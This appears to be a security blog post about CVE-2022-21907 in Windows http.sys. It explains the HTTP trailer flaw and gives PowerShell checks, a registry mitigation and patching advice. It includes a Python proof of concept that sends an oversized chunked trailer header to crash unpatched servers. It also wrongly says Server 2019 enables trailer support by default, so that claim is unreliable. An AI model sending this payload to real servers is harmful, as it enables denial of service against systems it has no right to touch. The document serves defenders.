In January 2022, Microsoft disclosed a dangerous vulnerability, tracked as CVE-2022-21907, in the Windows HTTP Protocol Stack, also known as http.sys. The bug is particularly alarming because it allows remote attackers to execute code on unpatched systems with no authentication required. In this post, we’ll break down what this vulnerability is, how it works, and what you can do to protect your systems.
What is http.sys and Why Should You Care?
http.sys is a core Windows component that handles HTTP requests at a very low level of the system. It powers web servers like IIS (Internet Information Services), but other Windows roles such as Remote Desktop Web, WinRM, and various service endpoints use it as well.
Per Microsoft:
> The vulnerability allows remote code execution in the Windows HTTP protocol stack. An unauthenticated attacker could send specially crafted packets to a vulnerable server utilizing the HTTP Protocol Stack (http.sys) to process packets.
(Microsoft Security Guide Reference)
How the Exploit Works
The culprit is HTTP trailer support. When enabled, this feature lets clients send additional HTTP headers after the message body of a request (trailers). Certain Windows versions mishandle these trailers, letting an attacker overflow buffers or corrupt memory and potentially run their code with SYSTEM privileges.
Sample Malicious Request (in Python)
import socket

# Chunked request whose trailer section carries one oversized header
payload = (
    "POST / HTTP/1.1\r\n"
    "Host: vulnerable.server\r\n"
    "Transfer-Encoding: chunked\r\n"
    "Trailer: ExploitHeader\r\n"
    "\r\n"
    "1\r\n"
    "A\r\n"
    "\r\n"
    "ExploitHeader: " + "A" * 10000 + "\r\n"
    "\r\n"
)

with socket.create_connection(("vulnerable.server", 80)) as sock:
    sock.sendall(payload.encode())
The ExploitHeader trailer, filled with 10,000 "A" characters, is the enormous trailer that triggers the bug.
*Running this against an unpatched Windows 10 or Server 2019 can crash the system—or worse, execute attacker code.*
- Windows servers with http.sys-based web services running.
- Systems with the HTTP Trailers feature enabled by default (Windows Server 2019, 2022, Windows 10 v1809+, etc.)
Proof-of-concept (PoC) exploits have surfaced:
- WatchTowr PoC
- Tenable Research Analysis & PoC
Most public PoCs cause a denial-of-service (DoS) (crash), but advanced attacks could achieve full remote code execution.
1. Do You Use HTTP Trailers?
By default, Windows Server 2019 and 2022 have it enabled. You can check with this PowerShell command (note that it throws an error if the value does not exist at all):
Get-ItemPropertyValue HKLM:\System\CurrentControlSet\Services\HTTP\Parameters -Name EnableTrailerSupport
1 means enabled. 0 or missing means disabled.
Check services listening on port 80 or 443:
netsh http show servicestate
1. Install Microsoft patches (January 2022 or later)
- Download security updates here
Set the registry key to 0 and reboot:
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\HTTP\Parameters" -Name "EnableTrailerSupport" -Value 0 -PropertyType DWord -Force
Restart-Computer
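The check and mitigation steps above combined into one script, as an added example that is not part of the original post. It assumes the registry path and value name quoted above; the function name, the -Disable switch and the output object are this example's own choices.

```powershell
# Added example (not from the original post): audit http.sys trailer support
# and, with -Disable, apply the registry mitigation described above.
# Run from an elevated PowerShell session; -Disable writes to HKLM.
function Test-HttpTrailerSupport {
    [CmdletBinding()]
    param(
        [switch]$Disable   # set EnableTrailerSupport to 0 (a reboot is still needed)
    )

    $keyPath = 'HKLM:\System\CurrentControlSet\Services\HTTP\Parameters'
    $name    = 'EnableTrailerSupport'

    # Get-ItemPropertyValue (used above) throws if the value does not exist.
    # Get-ItemProperty with -ErrorAction SilentlyContinue lets a missing value
    # be read as "disabled", which is what a missing value means here.
    $item  = Get-ItemProperty -Path $keyPath -Name $name -ErrorAction SilentlyContinue
    $value = if ($null -ne $item) { [int]$item.$name } else { $null }
    $enabled = ($value -eq 1)

    $state = 'missing (disabled)'
    if ($null -ne $value) {
        $state = if ($enabled) { '1 (enabled)' } else { "$value (disabled)" }
    }

    # Anything registered with http.sys (IIS, WinRM, RD Web, ...) goes through
    # the affected component, so list the URL reservations as well.
    $urls = @()
    if (Get-Command netsh -ErrorAction SilentlyContinue) {
        $urls = @(netsh http show servicestate |
                  Where-Object { $_ -match 'HTTPS?://' } |
                  ForEach-Object { $_.Trim() } | Sort-Object -Unique)
    }

    $remediated = $false
    if ($Disable -and $enabled) {
        Set-ItemProperty -Path $keyPath -Name $name -Value 0 -Type DWord
        $remediated = $true
        Write-Warning 'EnableTrailerSupport set to 0; reboot so http.sys picks it up.'
    }

    [pscustomobject]@{
        ComputerName   = $env:COMPUTERNAME
        TrailerSupport = $state
        Enabled        = $enabled
        HttpSysUrls    = $urls
        Remediated     = $remediated
    }
}

Test-HttpTrailerSupport            # audit only
# Test-HttpTrailerSupport -Disable # audit and apply the registry mitigation
```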
Key References
- Microsoft Security Advisory
- Tenable Research Deep Dive
- NVD Record
- WatchTowr PoC
Final Thoughts
CVE-2022-21907 is a Big Deal in the Windows world—if you haven’t patched your servers since early 2022, you might still be at risk. Because the vulnerability doesn’t require authentication, it’s especially dangerous for exposed web servers.
Patch now. Double-check rare/legacy Windows servers. For large deployments, consider disabling HTTP Trailers until every machine is patched. If you’re a defender, monitor your logs for suspicious chunked requests like the ones above.
Stay safe—don’t let remote attackers turn your servers against you!
Have more questions about CVE-2022-21907 or want to see related exploits? Leave a comment below.
Timeline
Published on: 01/11/2022 21:15:00 UTC
Last modified on: 08/20/2022 17:15:00 UTC